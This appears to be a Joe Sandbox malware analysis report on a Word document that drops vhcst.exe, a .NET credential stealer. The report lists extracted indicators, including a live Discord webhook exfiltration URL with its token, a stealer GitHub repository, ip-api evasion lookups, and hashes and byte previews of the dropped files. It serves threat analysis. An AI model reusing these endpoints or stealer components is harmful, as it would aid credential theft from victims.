                                        https://go.microsoft.copowershell.exe, 00000015.00000002.2030774863.000002D2CC2A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000007.00000002.1848334115.000002C100229000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000019.00000002.2053945057.0000023BE5303000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://go.micropowershell.exe, 00000019.00000002.2053945057.0000023BE6574000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/Licensepowershell.exe, 00000019.00000002.2152970287.0000023BF5143000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://discordapp.com/api/v9/users/vhcst.exe, 00000004.00000000.1769853932.0000023FBA422000.00000002.00000001.01000000.00000003.sdmp, SYTv5.scr.6.drfalse
                                                    		high
                                                    https://contoso.com/Iconpowershell.exe, 00000019.00000002.2152970287.0000023BF5143000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://discord.com/api/webhooks/1307747947399741462/ke8UE548A61Hf_m1cpanGTjUrsXfghQotpegEAB6XvUfFSqvhcst.exe, 00000004.00000002.1786281356.0000023FBC0F1000.00000004.00000800.00020000.00000000.sdmp, vhcst.exe, 00000006.00000002.2223963813.0000021F835B1000.00000004.00000800.00020000.00000000.sdmp, vhcst.exe, 00000006.00000002.2223963813.0000021F83A7F000.00000004.00000800.00020000.00000000.sdmp, vhcst.exe, 00000006.00000002.2223963813.0000021F83AB5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://github.com/PyDevOG/Divulge-StealerXvhcst.exe, 00000006.00000002.2223963813.0000021F83A7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://discord.comvhcst.exe, 00000006.00000002.2223963813.0000021F83A7F000.00000004.00000800.00020000.00000000.sdmp, vhcst.exe, 00000006.00000002.2223963813.0000021F83AB5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.mic.Bpowershell.exe, 00000007.00000002.1871870926.000002C17F9FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://github.com/Pester/Pesterpowershell.exe, 00000019.00000002.2053945057.0000023BE5303000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://crl.microsoft)powershell.exe, 00000019.00000002.2053127263.0000023BE3755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000007.00000002.1848334115.000002C100229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://contoso.com/powershell.exe, 00000019.00000002.2152970287.0000023BF5143000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.1863497642.000002C110075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1966120315.000002D2B56E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2023290691.000002D2C3FD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2023290691.000002D2C3E9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2053945057.0000023BE6A88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2152970287.0000023BF5286000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2152970287.0000023BF5143000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://ip-api.comvhcst.exe, 00000006.00000002.2223963813.0000021F8395B000.00000004.00000800.00020000.00000000.sdmp, vhcst.exe, 00000006.00000002.2223963813.0000021F839FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://github.com/PyDevOG/Divulge-StealerSYTv5.scr.6.drfalse
                                                                        		high
                                                                        https://oneget.orgXpowershell.exe, 00000015.00000002.1966120315.000002D2B52BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://aka.ms/pscore68powershell.exe, 00000007.00000002.1848334115.000002C100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1884173806.000002679FB28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1884173806.000002679FB41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1966120315.000002D2B3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2053945057.0000023BE50D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://ip-api.com/json/?fields=225545Pvhcst.exe, 00000006.00000002.2223963813.0000021F839EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevhcst.exe, 00000006.00000002.2223963813.0000021F835B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1848334115.000002C100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1884173806.000002679FB68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1966120315.000002D2B3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2053945057.0000023BE50D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://oneget.orgpowershell.exe, 00000015.00000002.1966120315.000002D2B52BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-vhcst.exe, 00000004.00000000.1769853932.0000023FBA422000.00000002.00000001.01000000.00000003.sdmp, SYTv5.scr.6.drfalse
                                                                                    		high

                                                                                    World Map of Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public IPs

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    162.159.136.232
                                                                                    		discord.comUnited States
                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                    108.181.20.35
                                                                                    		files.catbox.moeCanada
                                                                                    		852ASN852CAfalse
                                                                                    208.95.112.1
                                                                                    		ip-api.comUnited States
                                                                                    		53334TUT-ASUSfalse

                                                                                    General Information

                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1562811
                                                                                    Start date and time:2024-11-26 04:18:32 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 7m 44s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:28
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • GSI enabled (VBA)
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:5QnwxSJVyX.doc
                                                                                    (renamed file extension from none to doc, renamed because original name is a hash value)
                                                                                    Original Sample Name:0faaf305176113777cc706b6df9603c131382a35a0de9efd1cc2e883dd95459d
                                                                                    Detection:MAL
                                                                                    Classification:mal100.adwa.spyw.expl.evad.winDOC@31/256@3/3
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 16.7%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 67%
                                                                                    • Number of executed functions: 290
                                                                                    • Number of non-executed functions: 22
                                                                                    Cookbook Comments:
                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                    • Attach to Office via COM
                                                                                    • Scroll down
                                                                                    • Close Viewer

                                                                                    Warnings

                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 52.109.76.240, 52.113.194.132, 23.218.208.109, 13.89.179.9, 52.109.68.129, 172.217.17.35, 52.111.252.17, 52.111.252.16, 52.111.252.15, 52.111.252.18, 95.101.110.27, 95.101.110.24, 23.32.238.225, 23.32.238.241, 184.30.24.41
                                                                                    • Excluded domains from analysis (whitelisted): e1324.dscd.akamaiedge.net, binaries.templates.cdn.office.net.edgesuite.net, slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, a1847.dscg2.akamai.net, ecs-office.s-0005.s-msedge.net, onedscolprdcus09.centralus.cloudapp.azure.com, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, frc-azsc-000.roaming.officeapps.live.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, prod-all.naturallanguageeditorservice.osi.office.net.akadns.net, otelrules.azureedge.net, prod-inc-resolver.naturallanguageeditorservice.osi.office.net.akadns.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, osiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.com, uci.cdn.office.net, ctldl.windowsupda
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 5772 because it is empty
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7788 because it is empty
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7868 because it is empty
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 8120 because it is empty
                                                                                    • Execution Graph export aborted for target vhcst.exe, PID 7848 because it is empty
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    22:19:38API Interceptor24x Sleep call for process: powershell.exe modified
                                                                                    22:19:48API Interceptor257x Sleep call for process: vhcst.exe modified
                                                                                    22:19:50API Interceptor4x Sleep call for process: WMIC.exe modified

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    208.95.112.1uniswap-sniper-bot-with-gui Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                    • ip-api.com/json
                                                                                    RICHIESTA D'OFFERTA.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                    • ip-api.com/line/?fields=hosting
                                                                                    fat098765678900.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • ip-api.com/line/?fields=hosting
                                                                                    New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • ip-api.com/line/?fields=hosting
                                                                                    OC. 4515924646.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • ip-api.com/line/?fields=hosting
                                                                                    saiya.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                    • ip-api.com/line/?fields=hosting
                                                                                    windxcmd.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                    • ip-api.com/line/?fields=hosting
                                                                                    main.exeGet hashmaliciousBlank Grabber, SilentXMRMiner, XmrigBrowse
                                                                                    • ip-api.com/json/?fields=225545
                                                                                    _THALAT DEME DURUM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • ip-api.com/line/?fields=hosting
                                                                                    DESIGN LOGO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • ip-api.com/line/?fields=hosting
                                                                                    162.159.136.232S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                    • discord.com/administrator/index.php
                                                                                    108.181.20.35Document.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                    • files.catbox.moe/p1yr9i.pdf
                                                                                    SecuriteInfo.com.HEUR.Trojan.OLE2.Agent.gen.26943.12401.msiGet hashmaliciousLummaC StealerBrowse
                                                                                    • files.catbox.moe/nzct1p

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    discord.comspeedymaqing.exeGet hashmaliciousPython Stealer, Discord Token StealerBrowse
                                                                                    • 162.159.138.232
                                                                                    main.exeGet hashmaliciousBlank Grabber, SilentXMRMiner, XmrigBrowse
                                                                                    • 162.159.135.232
                                                                                    EsgeCzT4do.exeGet hashmaliciousXWormBrowse
                                                                                    • 162.159.137.232
                                                                                    cmd.exeGet hashmaliciousBlank GrabberBrowse
                                                                                    • 162.159.128.233
                                                                                    spacers.exeGet hashmaliciousUnknownBrowse
                                                                                    • 162.159.138.232
                                                                                    EternalPredictor.exeGet hashmaliciousBlank Grabber, Skuld Stealer, XWormBrowse
                                                                                    • 162.159.128.233
                                                                                    program.exeGet hashmaliciousBlank GrabberBrowse
                                                                                    • 162.159.137.232
                                                                                    RuntimeusererVers.exeGet hashmaliciousPython StealerBrowse
                                                                                    • 162.159.138.232
                                                                                    NEVER OPEN!.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                                                                                    • 162.159.137.232
                                                                                    HeilHitler.exeGet hashmaliciousBlank GrabberBrowse
                                                                                    • 162.159.128.233
                                                                                    ip-api.comuniswap-sniper-bot-with-gui Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                    • 208.95.112.1
                                                                                    RICHIESTA D'OFFERTA.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                    • 208.95.112.1
                                                                                    fat098765678900.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 208.95.112.1
                                                                                    New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 208.95.112.1
                                                                                    OC. 4515924646.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 208.95.112.1
                                                                                    saiya.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                    • 208.95.112.1
                                                                                    windxcmd.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                    • 208.95.112.1
                                                                                    main.exeGet hashmaliciousBlank Grabber, SilentXMRMiner, XmrigBrowse
                                                                                    • 208.95.112.1
                                                                                    _THALAT DEME DURUM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 208.95.112.1
                                                                                    DESIGN LOGO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 208.95.112.1
                                                                                    files.catbox.moefile.exeGet hashmaliciousFormBookBrowse
                                                                                    • 108.181.20.35
                                                                                    file.exeGet hashmaliciousFormBookBrowse
                                                                                    • 108.181.20.35
                                                                                    https://drive.google.com/uc?export=download&id=11w_oRLtDWJl2z1SKN0zkobTHd_Ix44t9Get hashmaliciousUnknownBrowse
                                                                                    • 108.181.20.35
                                                                                    LETA_pdf.vbsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                    • 108.181.20.35
                                                                                    file.exeGet hashmaliciousFormBookBrowse
                                                                                    • 108.181.20.35
                                                                                    https://files.catbox.moe/iz3lne.zipGet hashmaliciousUnknownBrowse
                                                                                    • 108.181.20.35
                                                                                    file.exeGet hashmaliciousFormBookBrowse
                                                                                    • 108.181.20.35
                                                                                    file.exeGet hashmaliciousFormBookBrowse
                                                                                    • 108.181.20.35
                                                                                    Exploit Detector LIST (2).batGet hashmaliciousUnknownBrowse
                                                                                    • 108.181.20.35
                                                                                    1.cmdGet hashmaliciousUnknownBrowse
                                                                                    • 108.181.20.35

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    ASN852CAfile.exeGet hashmaliciousFormBookBrowse
                                                                                    • 108.181.20.35
                                                                                    file.exeGet hashmaliciousFormBookBrowse
                                                                                    • 108.181.20.35
                                                                                    fbot.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                    • 209.29.180.177
                                                                                    fbot.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                    • 142.169.14.254
                                                                                    la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                    • 161.184.125.91
                                                                                    loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 99.199.126.12
                                                                                    loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                    • 75.157.133.90
                                                                                    loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                    • 207.216.32.196
                                                                                    apep.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                    • 207.6.179.91
                                                                                    apep.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                    • 75.156.102.38
                                                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                    • 172.64.41.3
                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                    • 172.67.187.240
                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.7.169
                                                                                    speedymaqing.exeGet hashmaliciousPython Stealer, Discord Token StealerBrowse
                                                                                    • 162.159.138.232
                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                    • 172.64.41.3
                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                    • 172.67.187.240
                                                                                    download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                    • 162.159.200.1
                                                                                    http://bc1qcr8muz00d2v7uqg5ggulrmm.comGet hashmaliciousUnknownBrowse
                                                                                    • 172.67.134.10
                                                                                    A095176990000.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.22.72.81
                                                                                    http://nxsnsstwhbaf.apexhallechuca.com.au/?userid=bHN3ZXN0LXN5c0BudHRscy5jby5qcA==Get hashmaliciousUnknownBrowse
                                                                                    • 1.1.1.1
                                                                                    TUT-ASUSuniswap-sniper-bot-with-gui Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                    • 208.95.112.1
                                                                                    RICHIESTA D'OFFERTA.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                    • 208.95.112.1
                                                                                    fat098765678900.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 208.95.112.1
                                                                                    New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 208.95.112.1
                                                                                    OC. 4515924646.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 208.95.112.1
                                                                                    saiya.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                    • 208.95.112.1
                                                                                    windxcmd.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                    • 208.95.112.1
                                                                                    main.exeGet hashmaliciousBlank Grabber, SilentXMRMiner, XmrigBrowse
                                                                                    • 208.95.112.1
                                                                                    _THALAT DEME DURUM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 208.95.112.1
                                                                                    DESIGN LOGO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 208.95.112.1

                                                                                    JA3 Fingerprints

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    6271f898ce5be7dd52b0fc260d0662b3file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                    • 108.181.20.35
                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                    • 108.181.20.35
                                                                                    https://www.e-serviceparts.info/landingpages/cce21bb4-48dd-49da-9e48-d89a21f56454/RtynoRElk6VQIiohoauuXaUdv9Gb4EPJBf3UQg9_Um4Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 108.181.20.35
                                                                                    file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                    • 108.181.20.35
                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                    • 108.181.20.35
                                                                                    P0-4856383648383364838364836483.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 108.181.20.35
                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                    • 108.181.20.35
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 108.181.20.35
                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                    • 108.181.20.35
                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                    • 108.181.20.35
                                                                                    3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                    • 162.159.136.232
                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                    • 162.159.136.232
                                                                                    file.exeGet hashmaliciousFormBookBrowse
                                                                                    • 162.159.136.232
                                                                                    file.exeGet hashmaliciousFormBookBrowse
                                                                                    • 162.159.136.232
                                                                                    Orden de compra HO-PO-376-25.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                    • 162.159.136.232
                                                                                    file.exeGet hashmaliciousCryptbotBrowse
                                                                                    • 162.159.136.232
                                                                                    INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 162.159.136.232
                                                                                    Evidence of copyright infringement (2).batGet hashmaliciousUnknownBrowse
                                                                                    • 162.159.136.232
                                                                                    Evidence of copyright infringement.batGet hashmaliciousUnknownBrowse
                                                                                    • 162.159.136.232
                                                                                    Compilation of videos and images protected by copyright.batGet hashmaliciousUnknownBrowse
                                                                                    • 162.159.136.232

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    C:\2716439\b5uubc.zip

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):83519
                                                                                    Entropy (8bit):7.991085993201395
                                                                                    Encrypted:true
                                                                                    SSDEEP:1536:QjC07FWxbvfXjwTqKZS81LDKS65U0ttMMD2d43hyZVKtKp3pvjmmjGfRoWq5Hyrp:QjC07IxbnUfXGd5UeW1JVpbmmaZoml
                                                                                    MD5:86B27920F9EFB4BF04ACD0145AB24520
                                                                                    SHA1:9627249E7A4B2557469ACC613E13C721715410F0
                                                                                    SHA-256:C1AFC1A202BAACA1267FCBCCAFBB8387C3B084419DF1488A829017DBAE37ED96
                                                                                    SHA-512:A7069CBB34818A4F752CAFB2091FFE2638F56D826A3B1F0B9A91296E912B179ACDB2D68B77D44607D12014E6A71F4C9BC016CBE5D180A657E1C80094795F1DB9
                                                                                    Malicious:false
                                                                                    Preview:PK........q%yY....E...x......vhcst.exe.}y....uUu.>3...={...ew......+.:....D...A.....P..Hb.D.h.....5F.y.&..&j..<..3...,..r..j.:=.......{.......9...%E.$...{%.Q.......p.d.....zi..._....U..u.y.u....\..\.be...}.......<{ew,../.8.PI:.H......-i./.$I..%......V...s...n..9...%J>.JI........g!...hW..n....]E.B...Z.Q.....h..G....W^....I..*....V.:K..6.Q........9.....Y..6S^...r.a....9......Oz.T...$.[.....H...u+....\.J....7.B...OA.(T..YNR.k0..2c3cogjYf.Sm.....#.pf..b.KP....`.,... u9..PB-/kY......o..U..MHO..|Z6.).#.....R.....%.H.rM..4@K.+I..*].|.f....0$t.....h.ZS...Y-.)....i. ..l.H.Ywc..O......`..>...hY."kF=...f...."...D.*....0..e9[..r*.{..?..Q,z .l.......K.f_G....e...j.e&8:......PflO\..............D.2+zj.6.kR(.....^K(c...L...j..c.f..w.^Q^....L...p...EV.$..3.....F.".@._M....Zz...1..rL..j...S..."-.h..*5....h!]5..a..4..Sy<..S=.Dr.m{.A..t.3>..5.`h.Vq...&..\...1.u+r.k.b.?....[Eh_8*@.K..D.y.\...S..l"b.Q&......DS.h2K.B....|4...,..ANV...P.oqh;.....P.j.w.r'......

                                                                                    C:\2716439\vhcst.exe

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):227328
                                                                                    Entropy (8bit):6.2114772668268765
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:XGo6iee4xUZA9Pt6Mf8noNM3MWQ/s17BH1grRBkrY1SZJGEVMFL5k:v6iee4xUi6Mf8nom3MWt7BVgrRBwY1Sd
                                                                                    MD5:6D8282E9F5AA75B07B018DC5CC2F6BC7
                                                                                    SHA1:6C7305E49E0112CAB9CA1E2959697DAE61D9B209
                                                                                    SHA-256:E5BDA70E2BD4948C011C1115DACD4DE5F9E3F0641066C16567EA05FD7F5C1398
                                                                                    SHA-512:E00DC8CF4194907844159B9D8F1CEE56BC476D0F97986AEAB8C6B854375FB4379D9A673C5685FCD2FBA0869DCF097C2E6E43D76DD6884D738C11DB6E0BC7F012
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\2716439\vhcst.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\2716439\vhcst.exe, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                                    • Antivirus: Virustotal, Detection: 54%, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ........@.. ....................................`.....................................S.... .............................|................................................ ............... ..H............text........ ...................... ..`.rsrc....... ......................@..@.reloc...............v..............@..B........................H............Z......0....................................................0..w.............%.T...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~.......t.*..0.............(....,..*r...ps....z..0..!..........,..o.............(....Q+...Q.*....0..5........(.......(....-#.,..o.....(....-..%-.&(......o....*.*&...(....*^......(.....(.........*^......(.....(.........*..0.......... ....s........(....-..*.o....*2.(....(....*..0..........

                                                                                    C:\7037005\b5uubc.zip

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):83519
                                                                                    Entropy (8bit):7.991085993201395
                                                                                    Encrypted:true
                                                                                    SSDEEP:1536:QjC07FWxbvfXjwTqKZS81LDKS65U0ttMMD2d43hyZVKtKp3pvjmmjGfRoWq5Hyrp:QjC07IxbnUfXGd5UeW1JVpbmmaZoml
                                                                                    MD5:86B27920F9EFB4BF04ACD0145AB24520
                                                                                    SHA1:9627249E7A4B2557469ACC613E13C721715410F0
                                                                                    SHA-256:C1AFC1A202BAACA1267FCBCCAFBB8387C3B084419DF1488A829017DBAE37ED96
                                                                                    SHA-512:A7069CBB34818A4F752CAFB2091FFE2638F56D826A3B1F0B9A91296E912B179ACDB2D68B77D44607D12014E6A71F4C9BC016CBE5D180A657E1C80094795F1DB9
                                                                                    Malicious:false
                                                                                    Preview:PK........q%yY....E...x......vhcst.exe.}y....uUu.>3...={...ew......+.:....D...A.....P..Hb.D.h.....5F.y.&..&j..<..3...,..r..j.:=.......{.......9...%E.$...{%.Q.......p.d.....zi..._....U..u.y.u....\..\.be...}.......<{ew,../.8.PI:.H......-i./.$I..%......V...s...n..9...%J>.JI........g!...hW..n....]E.B...Z.Q.....h..G....W^....I..*....V.:K..6.Q........9.....Y..6S^...r.a....9......Oz.T...$.[.....H...u+....\.J....7.B...OA.(T..YNR.k0..2c3cogjYf.Sm.....#.pf..b.KP....`.,... u9..PB-/kY......o..U..MHO..|Z6.).#.....R.....%.H.rM..4@K.+I..*].|.f....0$t.....h.ZS...Y-.)....i. ..l.H.Ywc..O......`..>...hY."kF=...f...."...D.*....0..e9[..r*.{..?..Q,z .l.......K.f_G....e...j.e&8:......PflO\..............D.2+zj.6.kR(.....^K(c...L...j..c.f..w.^Q^....L...p...EV.$..3.....F.".@._M....Zz...1..rL..j...S..."-.h..*5....h!]5..a..4..Sy<..S=.Dr.m{.A..t.3>..5.`h.Vq...&..\...1.u+r.k.b.?....[Eh_8*@.K..D.y.\...S..l"b.Q&......DS.h2K.B....|4...,..ANV...P.oqh;.....P.j.w.r'......

                                                                                    C:\7037005\vhcst.exe

                                                                                    Download File
